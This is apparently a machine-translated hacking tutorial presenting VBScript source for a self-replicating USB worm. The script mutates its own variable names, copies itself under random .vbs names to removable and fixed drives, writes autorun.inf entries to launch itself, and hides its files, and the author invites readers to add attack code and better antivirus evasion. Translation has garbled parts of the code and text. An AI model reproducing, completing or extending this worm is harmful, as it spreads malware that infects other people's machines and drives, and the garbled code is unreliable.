Article The title is called worm-like because Attack Code That is, the theme Code has not been implemented.
Sub yitiaolong () 'defines a one-stop process
On Error resume next 'here is to prevent errors when no matching device is found
Dim drivearray 'initializes the array variable
Dim drive 'Drive handle variable
Dim strarray 'initializes the string array variable
Dim vbcode 'is the code used to receive variations.
Dim File
Dim dirc 'is used to obtain random File Name
Set FSO = Createobject ("scripting. FileSystemObject ")
Set objshell = Createobject ("wscript. Shell ")
Drivearray = array ("C:", "d:", "E:", "F:", "G:", "H:") 'defines an array, the element is a drive letter. You can add it on your own.
For I = 0 to 5' cyclic comparison Disk
Set drive = FSO. getdrive (drivearray (I) 'get the drive handle
If drive. drivetype = 1 or drive. drivetype = 2 then 'is equal to 1 as a removable disk, and 2 as a fixed hard disk.
Strarray = array ("vbcode", "objshell", "FSO", "filehacker") 'defines an array to store characters to be changed.
Vbcode = FSO. opentextfile (wscript. scriptfullname, 1). readall' reads its own code and assigns it to the variable vbcode
For stri = 0 to 3
Vbcode = Replace (vbcode, strarray (stri), CHR (INT) (RND * 22) + 97) & CHR (INT) (RND * 22) + 97) & CHR (INT) (RND * 22) + 97) & CHR (INT) (RND * 22) + 97 ))) 'Replace the array escape characters with randomly generated characters
Next
Set file = FSO. createtextfile (drivearray (I) + "\ hack.txt") 'if you find a mobile hard disk or a fixed drive, create a file in it.
File. writeline vbcode 'Write your own code to hack.txt
File. Close
Dirc = CHR (INT) (RND * 22) + 97) & CHR (INT) (RND * 22) + 97) & CHR (INT) (RND * 22) + 97) & CHR (INT) (RND * 22) + 97) 'defines a variable with a random value.
Set file = FSO. GetFile (drivearray (I) & "\ hack.txt") 'receives the hack.txt handle.
File. Copy (drivearray (I) & "\" & dirc &".
Vbs ") 'Copy itself as a script file with random file names
File. Delete 'delete hack.txt itself
Set file = FSO. createtextfile (drivearray (I) + "\ autorun.txt") 'is generated in the driver root directory. autorun.txt
File. writeline "[Autorun]" 'write content
File. writeline "open =" & dirc &".
Vbs "
File. writeline "shell/open = open (& 0 )"
File. writeline "shell/Open/command =" & dirc &".
Vbs "
File. writeline "shell/oth = Resource Manager (& X )"
File. writeline "shell/oth/command =" & dirc &".
Vbs "
File. Close
Set file = FSO. GetFile (drivearray (I) + "\ autorun.txt") 'needless to say, get the handle
File. Copy (drivearray (I) + "\ autorun. inf") 'copies itself as autorun. inf
File. delete' delete yourself
Set file = FSO. createtextfile (drivearray (I) + "\ hack.txt") 'is creating the hack.txt file.
File. writeline "attrib + S + H + R" & drivearray (I) & "\ autorun. inf"
File. writeline "attrib + S + H + R" & drivearray (I) & "\" & dirc &".
Vbs "
File. Close
Set file = FSO. GetFile (drivearray (I) + "\ hack.txt ")
File. Copy (drivearray (I) + "\ hack. Bat ")
File. Delete
File = drivearray (I) + "\ hack. Bat"
Objshell. Run (File) and vbhide hide the hack. BAT file.
Wscript. Sleep 1000 'latency 1 second before execution
Objshell. Run ("CMD/C del" & file), vbhide 'delete hack. bat
End if
Next
Set FSO = nothing
Set objshell = nothing is mainly used to release memory. Space You can also add
End sub
Self-replication, variable self-modification, different file names, automatic generation and self-hiding of autorun files
The future development will be based on the readers. Your dissemination of thinking and the addition of attack code will be a very good vbs-type worm.
Sorry, the self-mutations and kill-free functions in this article are not very good. I can only blame myself for my limited capabilities and fail to realize the real self-mutations of scripts.
In terms of script, WMI isWindowsManagement Planning: there are strong functions here, but I have very few involved in this aspect. I have the opportunity to share with you !!!!
